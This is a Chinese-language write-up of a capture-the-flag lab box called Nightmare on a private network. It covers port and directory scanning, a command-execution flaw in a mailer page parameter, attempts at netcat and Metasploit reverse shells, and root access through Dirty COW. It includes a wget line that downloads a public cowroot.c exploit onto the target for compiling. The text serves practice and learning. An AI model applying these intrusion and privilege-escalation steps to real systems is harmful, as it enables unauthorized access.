Nightmare靶場滲透記錄
一、線索資料
靶機ip:192.168.56.168
kali:192.168.56.128
二、日常掃端口
80端口/22端口
先檢視一波80
首頁讓輸入一個名字來開始CTF
似乎一切正常,點選start後,出現頁面(吓一跳~)
上面提示:
這到底是什麼?有個叫PuPPET的家夥想滲透我的伺服器?失敗者一定不知道我是偉大的瓦拉布!
讓我們暫時觀察一下他,也許我可以從他的行為中了解他。
發現我的滲透了?!
這個頁面沒什麼資訊可以收集了~
三、日常掃目錄
目錄中除了js,jquey沒什麼,但是url 可以發現page參數,嘗試page參數再掃一波
果然有結果,發現很多,除了home,再看一下index和mailer
不管輸入什麼都是連接配接失敗…我靠~~~最後發現首頁都進不去了,nmap再掃一下
我靠這個老六把端口改了60080,怪不得一直進不去,重新通路一下
翻譯:
親愛的莫莉,這家夥PuPPET想要我…很高興我搬到了另一個港口,這樣我可以更安全地工作!!!
我們都知道,默默無聞的安全是我們的出路。。。
通路index:
是之前那個頁面
通路mailer:
又是一句話~ =。=|||
但是源代碼中發現了線索:
提示message goes here ,嘗試了半天,發現shell指令可以在這裡執行
本地包含漏洞啊~LFI
四、反彈shell
瑞士軍刀出場
翻譯:
你怎麼會這麼明顯地使用netcat。指揮官,這都在日志裡。
反彈不回來,這貨還來一句嘲諷…
msf嘗試
(想說,今天的msf logo 真好看)
搜尋反彈shell
(淦!當機了!)
[外鍊圖檔轉存失敗,源站可能有防盜鍊機制,建議将圖檔儲存下來直接上傳(img-HUHyvx9a-1673448372239)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20230111014000527.png)]
msf擷取shell後,回車程式設計^M ,一直無法執行指令。搞了半天,一直當機。。。
攻略了下,換了種大佬的反彈shell的方式。用nc嘗試連接配接
五、提權
檢視sudo -l 越權指令,沒有可用
攻略後,需要再次使用髒牛提權,上次剛用過,直接下載下傳到靶機
發現執行完髒牛後,卡在那裡不動了,退出後靶機直接奔潰… 醉了真是
此處沒有拿到root權限,暫沒有想到辦法…
攻略後,重新找了個髒牛提權檔案
wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c
wget下載下傳
編譯:
提權成功,可以在root目錄下看到flag,但是卻cat不出~~~~